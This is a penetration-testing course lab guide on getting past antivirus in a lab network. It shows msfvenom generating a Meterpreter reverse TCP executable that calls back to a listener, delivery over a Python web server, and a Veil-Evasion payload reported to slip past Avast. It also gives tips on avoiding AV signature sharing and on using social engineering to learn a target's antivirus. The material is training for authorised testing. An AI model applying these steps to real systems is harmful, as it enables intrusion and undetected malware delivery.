© 2018 Caendra, Inc. - Hera For PTP - Bypassing AV
Lab network (from the diagram): Victim01 (Avast) 172.16.5.10, Victim02 (MSE) 172.16.5.5, Pentester (your PC) 172.16.5.x, all on the 172.16.5.0 network.
To guide you during the lab you will find different Tasks.
Tasks are meant for educational purposes and to show you the usage of different tools and
different methods to achieve the same goal.
Armed with the skills acquired through the Tasks, you can achieve the lab goal.
If this is the first time you are doing this lab, we advise you to follow these Tasks.
Once you have completed all the Tasks, you can proceed to the end of this paper and check
the solutions.
• Metasploit
• Veil
Hint: In both systems (172.16.5.5 and 172.16.5.10), you can login via rdesktop, with the
username admin and the password et1@sR7!
To check the huge list of available payloads, run from the console the following command:
root@kali:~/LABS/16# msfvenom -l
This is the command that will generate our first malicious code:
• -p windows/meterpreter/reverse_tcp
The payload to embed in our shellcode. Once executed, it will launch a reverse TCP
Meterpreter shell back to our system at 172.16.5.50 on port 4444. We'll need to have
the multi/handler module running and waiting for incoming connections on that IP and
port.
• LHOST=172.16.5.50
Our listening IP address
• LPORT=4444
The listening port on which the victim will connect back. Keep in mind that with a
firewall in the middle of these systems we must pick a port that is allowed.
• -f exe
The file format
Now, we need to upload our malicious file, rTCP.exe, onto our victim system,
172.16.5.10. To do this, we'll start a local web server with Python's "SimpleHTTPServer"
module and copy the shell into the web root. Later, we'll download this file from the
victim machine.
Now, we need to start the multi/handler exploit from Metasploit. This way, we'll have
something listening for when the victim opens the rTCP.exe file.
Since we are going to download our malicious shell, let’s disable Avast AV. Open Avast
from the desktop icon, and then from settings > Active Protection, disable all the
options:
Now, open Chrome and download the rTCP.exe from our webserver:
meterpreter >
Let's query the shell by asking some basic information, like the following:
And in a similar way we can run other commands. But now, let's close the meterpreter
session by sending the quit command.
Then, download the new file, eTCPenc.exe and check if Avast is able to detect it:
In newer versions of Kali (rolling), it can be installed with the following command:
root@kali:~/LABS/16# veil
===============================================================================
Veil | [Version]: 3.1.7
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
Veil>:
Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
41 payloads loaded
Available Commands:
Veil/Evasion>: list
…
25) python/meterpreter/bind_tcp.py
26) python/meterpreter/rev_http.py
27) python/meterpreter/rev_https.py
28) python/meterpreter/rev_tcp.py
29) python/shellcode_inject/aes_encrypt.py
30) python/shellcode_inject/arc_encrypt.py
31) python/shellcode_inject/base64_substitution.py
…
Veil/Evasion>: use 26
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Payload Information:
Required Options:
Available Commands:
[python/meterpreter/rev_http>>]: generate
Next, we need to assign a name for the malicious file that we are creating. In this example,
let’s use the name rTCPveil, no extension is needed:
[>] Please enter the base name for output files (default is payload): rTCPveil
1 - PyInstaller (default)
2 - Py2Exe
Then, once again, let's copy the executable created by Veil to our local directory, so we can
download it to our victim machine using the Python SimpleHTTPServer.
root@kali:~/LABS/16# cp /var/lib/veil/output/compiled/rTCPveil.exe .
After that, connect to the system 172.16.5.10 (where Avast is installed and enabled),
download this new executable (rTCPveil.exe) and see if you are still detected by
the antivirus.
If everything went well, you will be able to download the executable successfully. Then, go
back to the multi/handler exploit and see if you got a Meterpreter session from the system
172.16.5.10 after the malware was run:
Type ps in the Meterpreter session and see if you are able to see one of the Avast
executables still running on that system. This confirms that we were able to get past
Avast unnoticed.
Process List
============
We do not recommend that you upload your malicious files generated by any source
(msfvenom, Veil, etc.) to online AV scanners like www.virustotal.com, because later
on these files are shared with AV companies, who will be able to create signatures to catch
them. The best thing to do is to first find out what your target (customer) uses as an AV
solution (see job posts and forums to see if it is published somewhere; you may also use
your social engineering skills (call and ask), and you will be surprised how people share this
information without any concerns). Then download a trial version of the AV solution used
by your customer in a lab environment and update it to the latest virus definitions. Once you
are able to bypass it, you can deliver the piece of code, provided that it is part of your
engagement's scope.
I have uploaded the piece of code generated by Veil (according to the steps above) to
VirusTotal so you can get an idea of how powerful it really is (only 3 out of 50 vendors
detected it):
If everything goes well, the same piece of malware generated by Veil (above) should bypass
MSE as well.